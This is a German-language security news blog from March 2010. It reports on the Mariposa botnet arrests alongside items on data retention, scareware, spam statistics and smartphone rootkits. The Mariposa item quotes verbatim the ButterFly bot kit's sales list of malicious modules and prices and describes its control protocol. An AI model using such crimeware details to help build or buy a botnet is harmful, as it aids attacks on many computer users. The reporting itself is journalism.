Ich war Heute auf der Cebit am Kaspersky Stand und habe da eine Seite gesehn die mir sehr gefällt und wer mich kennt weiß ja das ich auf Kaspersky schwöre.Virus Watch zeigt alle Neueingänge bei Kaspersky mit schönen Animationen.Es ist leider keine Live Statistik,aber sie wird ständig Aktualisiert.

>>> Kaspersky Virus Watch <<<

Donnerstag, 4. März 2010

Mariposa Hintermänner

Bei den Betreibern des Mariposa Botnetz handelt es sich um 3 Personen die nur mit ihren Nickname bekannt sind: "netkairo," 31; "jonyloleante," 30; und "ostiator," 25, befinden sich in Haft.Es handelt sich hier nicht um Jugendliche sondern schon um Erwachsene Männer und alle ohne Vorstrafen.


Update 05.03.10 00:39Uhr
Die Bot Herder konnten gefast werden da sich einer der 3 Betreiber ohne einen Proxy in das Botnet Einlogte und die Polizei ihn über seine Provider IP ausfindig machen konnte.

Details zu Mariposa

Mariposa Basiert auf dem im Underground bekannten ButterFly Bot der von Iserdo Programmiert und Verkauft wierd.



ButterFly wird jeh nach bedarf und Funktionen zu folgenen Preisen angeboten.
Packages:

  • BASIC: 350 EUR
    (BFF core with modules: External Downloader, USB Spreader, MSN Spreader)

  • PREMIUM: 400 EUR
    (BFF core with modules: External Downloader, Basic Flooder, Slowloris Flooder)

  • BUSINESS: 450 EUR
    (BFF core with modules: External Downloader, Visit, Cookie Stuffer, Adware Simple)

  • STANDARD: 600 EUR
    (BFF core with modules: External Downloader, USB Spreader, MSN Spreader, Basic Flooder, Visit, Reverse Socks Simple)

  • SELECTED: 600 EUR

    (BFF core with modules: External Downloader, USB Spreader, MSN Spreader, Basic Flooder, Slowloris Flooder)

  • PROFESSIONAL: 900 EUR
    (BFF core with modules: External Downloader, Visit, Reverse Socks Simple, Connect Hook, Post Data Grabber, Cookie Stuffer, Adware Simple)

  • ULTIMATE: 1100 EUR
    (BFF core with modules: External Downloader, Basic Flooder, Slowloris Flooder, USB Spreader, MSN Spreader, Visit, Reverse Socks Simple, Connect Hook, Post Data Grabber, Cookie Stuffer, Adware Simple)

  • CUSTOM: price depends on chosen modules
    (BFF core with modules you can choose!)


Prices of modules*:

  • Basic Flooder: 100 EUR

  • Slowloris Flooder: 200 EUR

  • USB Spreader: 100 EUR

  • MSN Spreader: 100 EUR

  • Visit: 100 EUR

  • Reverse Socks Simple: 100 EUR

  • Post Data Grabber: 200 EUR

  • Connect Hook: 200 EUR

  • Adware Simple: 100 EUR

  • Cookie Stuffer: 200 EUR


* Modules can be purchased seperatedly later at any time. There are no rebuilds needed. Using newly purchased module is very simple (Plug&Play mechanism).

Licenses*

  • 3 months: 150 EUR

  • 6 months: 250 EUR

  • 12 months: 400 EUR



Der Bot verfügt über ein eigenes Protokoll welches eine Kontrolle ohne eigene Server erlaubt.

Image and video hosting by TinyPic
Clients and master client(s) communicate with server. There is no direct communication between clients and master client(s). There is also no connection, because communication is based on UDP protocol which is connection-less. All "connection(s)" mentioned on this page is/are referred to connection-impersonating created by this software on upper level. BFF Clients do not connect to Master Client directly (like with RAT - remote administrative tools), instead they connect to BFF Server. BFF Master Client connects to BFF server. Order routes, replies and protocol information are therefore taken care by BFF Server.


Ähnlich wie bei bekannten Remote Administration Tools wie Bifrost und Poison Ivy verbinden sich die Dronen zu dem Pc auf dem sich der Master Client befindet z.b ein Home Pc.


Die Mariposa Server können mit diesem Plugin für Wireshark version 1.2.2 Decodiert werden.

Alle Funktionen des Bots lassen sich einfach über eine Grafische Oberfläche ausführen.
Image and video hosting by TinyPic

Image and video hosting by TinyPic

Dies ermöglicht eine einfache Bedienung ohne große Erfahrung zu haben.Früher hatte man für einene Malware wie Agobot den Source-Code in dem Fehler eingebaut waren und man schon Kenntnisse mit C/C++ haben muste um ein Botnet betreiben zu können,sowie erfahrung mit IRCds die auf einen Server Installiert und konfiguriert werden musten.Die Cybercrime spricht mit ihren Angeboten jede Zielgruppe an und jeder kann mit solch einfachen GUI Bots wie Mariposa/ButterFly ein Botnet aufbauen.

Mittwoch, 3. März 2010

Spanische Polizei gibt Einzelheiten zu Mariposa-Verhaftungen bekannt

Die spanische Polizeieinheit Guardia Civil hat am Mittwoch Einzelheiten zur Festnahme von drei mutmaßlichen Hauptverantwortlichen eines unter dem Namen "Mariposa" bekannten Botnetzes (PDF-Datei) mitgeteilt. Festgenommen wurden in den vergangenen Wochen demnach drei Spanier, denen vorgeworfen wird, seit Ende 2008 über 13 Millionen Computer unter ihre Kontrolle gebracht und damit eines der größten Botnetze weltweit betrieben zu haben. Bei Hausdurchsuchungen in Valmaseda, Santiago de Compostela und Molina de Segura beschlagnahmten die Behörden den Angaben zufolge umfangreiches Beweismaterial, darunter Zugangsdaten zu Unternehmensnetzen, Online-Banking-Accounts und E-Mail-Konten von mehr als 800.000 Nutzern.



Unterstützt wurde die "Grupo de Delitos Telemáticos" der Guardia Civil vom amerikanischen FBI, dem Georgia Tech Information Security Center, dem spanischen Hersteller von Sicherheitssoftware Panda Security und dem Defense Intelligence Team, das im Mai 2009 auf "Mariposa" aufmerksam wurde und anschließend zahlreiche Master-Server identifizierte, von denen die gekaperten Windows-Rechner Befehle zum Herunterladen von weiteren Schadprogrammen wie Key-Loggern erhielten. Aufgebaut wurde das Netz offenbar vor allem über das Versenden von Links auf präparierte Webseiten in Instant Messages. Rief der Empfänger eine der Seiten auf, wurde eine nicht näher spezifizierte Sicherheitslücke im Internet Explorer zur Infizierung des Rechners ausgenutzt.

Zum Mariposa-Botnetz, dessen "Command and Control Server" bereits am 23. Dezember vergangenen Jahres vom Netz genommen worden sein sollen, gehörten den Angaben zufolge PCs in 190 Ländern, darunter Rechner in Schulen, Regierungsinstitutionen und hunderten Großunternehmen. Den entstandenen Schaden vermag die Guardia Civil derzeit nicht zu beziffern. Offenbar wurde das Botnetz aber auch an andere Interessengruppen vermietet: So verzeichnete das Defense Intelligence Team (dessen Name selbst für Master-Server-Domains wie "defintelsucks.com" missbraucht wurde) Anfang November massive DOS-Attacken auf mehrere arabische Websites. Die Mariposa-Hauptverantwortlichen erwarten bei einer Verurteilung in Spanien mehrjährige Haftstrafen wegen Computersabotage und Betrugs.

Mariposa_Analysis.pdf

News-Meldung vom 03.03.2010 15:15



Symantec Analysen
Jailing the Butterfly
The Mariposa Butterfly
The Mariposa / Butterfly Bot Kit

Microsoft will infizierte Computer in Quarantäne stecken

Ein Topmanager aus Redmond hat jetzt öffentlich laut gedacht und die vorgeschriebene Isolierstation für alle mit Malware belasteten Rechner und Zombies vorgeschlagen.


MS-Vizepräsident Scott Charney, im Konzern zuständig für Computersicherheit, brachte seine Initiative ganz informell per öffentlicher Rede auf den Weg. Wohl, um die Meinung der Branche zu testen. So äußerte er sich bislang auch noch nicht über spezifische Details wie: Wer soll eigentlich das Monitoring übernehmen? Wer trifft dann die Entscheidung, welche Maschinen isoliert werden? Wer führt es aus? Worüber sich Charney im Klaren ist: Solche verseuchten Rechner müssen unbedingt aus der Online-Öffentlichkeit verbannt werden. Er vergleicht es mit Zigarettenrauch, der die Nichtraucher belästigen und schädigen würde.

»Ein Mensch hat die Freiheit, sich selber in Gefahr zu bringen, sich zu infizieren und sich Krankheiten einzufangen. Er hat aber nicht das Recht, andere zu gefährden und zu infizieren. Wir sollten diese Regel um seinen Computer erweitern«, formulierte es Charney auf der RSA Security-Konferenz in San Francisco.
Er ist natürlich nicht der Urheber einer solchen Idee, aber nun einer der prominentesten Verfechter dieses Sicherheitskonzepts. Wie es logistisch zu stemmen wäre, darüber herrscht noch absolute Ratlosigkeit. Manche wollen den Schwarzen Peter (wieder einmal) den Internet Service Providern in die Schuhe schieben. Sie sollen für Überwachung und Abschaltung sorgen. Wie er das machen und wer dafür aufkommen soll, darüber herrscht völlige Uneinigkeit. (Quelle: TheInquirer.de)

Mittwoch, 03 März 2010 7:37

Dienstag, 2. März 2010

Kaspersky stellt neues Security-Paket "Pure" vor

Der russische AV-Hersteller Kaspersky hat das speziell auf die Bedürfnisse von Haushalten mit mehreren PCs zugeschnittene Security-Paket Kaspersky Pure vorgestellt. Zu den Funktionen der Security-Suite (Virenschutz, Firewall, Identitätsschutz und Tune-up) gesellen sich in Pure Backup-Tool, Festplattenverschlüsselung, Passwortmanager und eine zentrale Netzwerkverwaltung für lokale PCs. Tune-up, Kindersicherung und Identitätsschutz wurden gegenüber der Suite verbessert.



So unterstützt Pure nun verschiedene Instant Messenger und kann steuern, welcher PC zu welcher Uhrzeit welche Anwendungen ausführen und welche Webseiten aufrufen darf. Die Regeln lassen sich über die Netzwerkverwaltung zentral konfigurieren. Außerdem lässt sich über diese beispielsweise der Update-Stand der PCs prüfen oder ein Virenscan starten. Pure soll ab Ende März im Handel erhältlich sein. Die Jahreslizenz für drei PCs kostet 80 Euro.

News-Meldung vom 02.03.2010 20:13

Vorratsdatenspeicherung wieder vom Tisch

Auf Karlsruhe ist Verlass: Jede größere dummdreiste Idee aus Berlin wird vom Bundesverfassungsgericht kassiert. Heute morgen nun auch endlich die lästige Vorratsdatenspeicherung.


Datenschützer und aufrechte Bürger haben es natürlich immer gewusst: Die massenhafte Datensammlung ist komplett verfassungswidrig. Zumindest in der aktuellen handwerklich kruden Umsetzung. Nach drei Jahren Streitereien geben die obersten Richter der Republik damit den Gegner des Gesetzes Recht: Es ist ein unverhältnismäßiger Eingriff in die Privatsphäre und würde die heilige Unschuldsvermutung unserer Verfassung aushebeln.
Mit aufwendigen Studien wurde im Verfahren belegt, dass die Datenspeicherung viele Menschen in ihrem Kommunikationsverhalten beeinflusst. Berufsgeheimnisträger wie Ärzte, Anwälte und Journalisten sahen Probleme auf sich zukommen. Vielen Internet-Providern war die Maßnahme ebenfalls ein Dorn im Auge, verursachte sie doch erhebliche Arbeit und Kosten. Und neue Pfründe für Datendiebe.

Die Verfassungsrichter zeigten sich skeptisch angesichts des ewigen Totschlagarguments, damit ja nur Terroristen und Kinderschänder jagen zu wollen. Urteil: Die entsprechenden Gesetze wurden voll inhaltlich für ungültig erklärt. Eine sofortige Löschung der bereits gesammelten Daten wurde angeordnet. Für eine Vorlage an den europäischen Gerichtshof bestehe kein Anlass, warnten die Richter. Die EU-Richtlinie aus Brüssel könne man in Zukunft nur umsetzen, wenn Berlin es nochmal mit einem völlig neuen Gesetzesentwurf versucht. Jener dürfte den Zugriff auf gesammelte Daten nur bei schweren Straftaten erlauben. Jeder Zugriff müsse protokolliert und transparent nachvollziehbar sein. Das sei beim bisherigen (abgeschmetterten) Gesetz natürlich nicht der Fall. (Quelle: TheInquirer.de)

Dienstag, 02 März 2010 14:44

Montag, 1. März 2010

Ein Botnetz geht, der Spam bleibt

Das in der vergangenen Woche von Microsoft nach eigenen Angaben mit juristischen Mitteln stillgelegte Waledac-Botnet hatte offenbar wenig mit dem Versenden unerwünschter E-Mails zu tun. Microsoft hatte dem Verbund verseuchter PCs einen Ausstoß von bis zu 1,5 Milliarden Müll-Mails pro Tag zugetraut. Doch die Blacklist-Statistiken des iX-Antispam-Projekts, die den Mail-Eingang auf Tausenden von Mailservern weltweit widerspiegeln, zeigen in den vergangenen Tagen und Wochen keine besonderen Vorkommnisse (siehe Bilderstrecke).

Waledac dürfte folglich in letzter Zeit entweder gar nicht zum Spammen im Einsatz gewesen sein – oder die Spam-Versender haben inzwischen wirksame Umgehungsmechanismen für derartige Gegenmaßnahmen entwickelt und einfach auf andere Botnetze umgeschaltet.







Ganz erhebliche Auswirkungen auf das weltweite Spam-Aufkommen hatte im November 2008 die Zwangstrennung des Hosters McColo vom Internet gehabt, wie eine der abgebildeten Statistiken ebenfalls zeigt. Zeitweise war die Zahl der Spam-Zustellversuche um drei Viertel eingebrochen. Mittlerweile hat sich die Lage längst wieder "normalisiert", und je nach Quelle ist von 95 oder gar 99 Prozent Spam-Anteil am Mail-Verkehr die Rede.

Wie die abgebildeten Zahlen zustande kommen und weitere Details der Blacklist "NiX Spam" erklärt iX-Autor Marcel Lohmann auf der CeBIT: Dienstag, den 2. März und Donnerstag, den 4. März, jeweils um 10 Uhr auf dem Heise-Forum "Sicherheit und IT-Recht" in Halle 5/E38.

News-Meldung vom 01.03.2010 19:05

Forscher warnen vor Rootkits bei Smartphones

Informatiker an der Rutgers University haben davor gewarnt, dass sogenannte Rootkits Angreifern umfassende Möglichkeiten wie das Abhören von Telefonaten oder GPS-Positionsüberwachen bieten können.

Da diese Form der Malware tief in das Betriebssystem eindringt, wäre sie gerade auf Smartphones praktisch nicht aufzuspüren. Auf einem Openmoko Neo Freerunner haben die Forscher drei Beispiel-Rootkits realisiert, um ihre Warnung zu unterstreichen. Allerdings haben sie die Schädlinge dabei nicht tatsächlich über Sicherheitslücken eingeschleust. Daran, dass eben dieser in der Praxis entscheidende Schritt überhaupt möglich wäre, hat Sophos-Experte Graham Cluley seine Zweifel. Beim iPhone macht Apples geschlossenes App-Ökosystem das fast unmöglich.

Liviu Iftode, Informatik-Professor an der Rutgers University, und sein Team betonen, dass Smartphone-Rootkits noch gefährlicher sein könnten als auf dem PC. Das liegt daran, dass die Geräte ständig mitgeführt werden. Wie ihre Beispiele zeigen, könnte ein Angreifer einfach per SMS die aktuelle GPS-Position des Nutzers abrufen oder das Smartphone-Mikro zum Belauschen von Gesprächen missbrauchen. Das gezielte Einschalten stromfressender Gerätekomponenten wiederum kann den Smartphone-Akku schnell leeren.

"Was wir gemacht haben, ist ein Warnsignal", sagt Iftode. Nun sei es wichtig, an Rootkit-Abwehrmechanismen für Smartphones zu arbeiten. Die vom Desktop bekannten Methoden sind den Forschern zufolge nämlich problematisch. Ein externes Gerät müsste den Speicher prüfen können, ohne dass das Smartphone-Betriebssystem aktiv wird, während eine virtuelle Maschine den Akku zu sehr belasten dürfte.

Die Rutgers-Forscher haben ihre Rootkits auf einem Entwickler-Gerät installiert. In der Praxis müsste das Betriebssystem einem Angreifer erst einmal ermöglichen, derart tiefgreifende Änderungen überhaupt vorzunehmen. Beim iPhone etwa kann nur Software installiert werden, die von seinen "Herrschern" in Cupertino abgesegnet wurde, betont Cluley. "Auch bei Android muss der User erst einmal Apps aus nicht-autorisierten Quellen zulassen", meint er gegenüber pressetext. Insgesamt wäre es seiner Ansicht nach wohl deutlich schwerer, einen Rootkit auf einem Smartphone einzuschleusen als auf einem Windows-PC.

Dabei spielt mit, dass Cluelys Ansicht nach User bei Smartphones nicht so bereitwillig Apps aus unbekannten Quellen installieren. Beim iPhone beispielsweise setzt sich vornehmlich Gefahren aus, wer das Gerät knackt. Viele Smartphone-Betriebssysteme bieten einen zentralen Store. "Selbst wenn da eine bösartige App auftaucht, kann sie schnell für alle gelöscht werden", sagt der Experte. Er verweist darauf, dass beim iPhone Mitte 2008 sogar ein Killswitch für bereits installierte Apps bestätigt wurde. "Das ist etwas völlig anderes als mit völlig frei im Web verfügbaren Downloads", betont Cluley abschließend.

1.03.2010 17:53 MSK

World of Warcraft: Account trotz Authenticator geknackt

Virtuelle Gegenstände nach Man-in-the-Middle-Angriff gestohlen

Trotz des Hardwareschutzes Authenticator ist es Unbekannten offenbar gelungen, das Benutzerkonto eines Spielers von World of Warcraft zu knacken und seine virtuellen Taschen zu leeren. Blizzard untersucht die Vorgänge.

Eigentlich soll der Authenticator von Blizzard - eine Art Schlüsselanhänger, der einen nur kurze Zeit gültigen Zusatzcode für die WoW-Authentifizierung generiert - dafür sorgen, dass die Benutzerkonten bei World of Warcraft für Unbefugte so gut wie nicht zu knacken sind. Trotzdem ist es Unbekannten nun offenbar gelungen, in den Account eines Spielers einzudringen und virtuelle Gegenstände zu stehlen; die Ausrüstung dürfte sich auf einschlägigen Webseiten zu Geld machen lassen.

Die Diebe haben laut einem Bericht im offiziellen WoW-Forum eine Datei namens "emcor.dll" auf dem Rechner ihres Opfers eingeschleust - wie, ist unbekannt. Anschließend konnten sie offenbar einen Man-in-the-Middle-Angriff ausführen, sich also zwischen den Rechner des Spielers und die Server von Blizzard einklinken, so auf den Datenstrom zugreifen und ihn kontrollieren. Blizzard will den Vorgang ernst nehmen und hat Untersuchungen angekündigt.

Security / 01.03.2010 / 15:17

Scareware wird handgreiflich

Eine besonders hartnäckige Form von Scareware hat das Microsoft Malware Protection Center (MMPC) in seinem Blog beschrieben. Sie gibt sich zu allem Übel in Anlehung an Microsoft Security Essentials als "Security Essentials 2010" aus.

Die von den Redmondern als Fakeinit bezeichnete Scareware nervt den Anwender nicht nur mit Falschmeldungen über Dutzende von Infektionen des PCs mit Viren und Trojanern, sondern wird quasi auch noch handgreiflich. Sie versucht nicht nur diverse andere Programme zu beenden, weil sie angeblich infiziert seien, sie lädt zudem noch das Rootkit Alureon auf den Windows-PC und installiert es.

Darüber hinaus klinkt sich die Scareware als Komponente "Layered Service Provider" (LSP) in die Netzwerkverbindung und überwacht, ob der Anwender bestimmte Seiten aufruft. Bei Versuchen, populäre Webseiten wie amazon.com, ebay.com und twitter.com aufzurufen, blockiert Fakeinit den Aufruf und blendet stattdessen den Hinweis im Browser ein, der PC sei infiziert – man solle eine Antivirensoftware installieren.

Zudem tauscht die Scareware den Bildschirmhintergrund des Desktops gegen eine Warnung "Your System is infected" aus. Schließlich versucht sie den Anwender durch stetige Aufrufe der Seite buy-security-essentials.com zum Kauf einer 50 Euro teuren Vollversion der "Security Essentials 2010" zu bewegen. Die Seite ist mittlerweile vom Netz genommen.

Microsoft warnt zwar vor Fakeinit und weist darauf hin, dass die echten Microsoft Security Essentials die Scareware erkennen würde. Im Blog des MMPC gibt es jedoch keine konkrete Anleitung, wie sich Anwender verhalten sollten, die bereits betroffen sind. Einschlägige Foren zu dem Thema wie trojaner-board.de und xp-vista.com halten jedoch diverse Anleitungen vor. In Anbetracht der Installation des Alureon-Rootkits sollten Anwender jedoch eine Neuinstallation des Systems erwägen. Zuletzt machte Alureon von sich reden, weil es nach der Installation des Sicherheits-Updates MS010-015 unter Windows XP Bluescreens verursachte.

News-Meldung vom 01.03.2010 12:30

Kaspersky Security Bulletin 2009: Spam

Zahlen und Fakten des Jahres



  • Im Jahr 2009 betrug der Spam-Anteil im E-Mail-Traffic 85,2 Prozent.
  • Die meisten Spam-Mails (16 Prozent) kamen im vergangenen Jahr aus den USA, ebenso viel Spam wurde aus den asiatischen Ländern verschickt.
  • Der Anteil an Phishing-Mails betrug 0,86 Prozent.
  • Schädliche Anhänge waren in 0,85 Prozent der E-Mails enthalten.
  • Die weltweite Wirtschaftskrise hatte großen Einfluss auf die Spam-Themen.
  • Nach wie vor ist SMS-Betrug in Spam-Mails bei den Cyberkriminellen sehr beliebt.
  • Spam-Mails enthielten erstmals Links auf Spam-Videoclips bei YouTube.
  • Die Einsatzmethoden von HTML zur Tarnung von Links in Spam-Mails wurden weiter verbessert.
  • Erneut kamen verschiedene Arten von Grafiken zum Einsatz, um die Spam-Filter zu umgehen.
  • Um die Anwender neugierig zu machen, wurden wieder aktuelle Themen und die Namen bekannter Persönlichkeiten verwendet.
  • Die Spammer machten sich die Beliebtheit sozialer Netzwerke zu Nutze.

>>>Mehr dazu hier<<<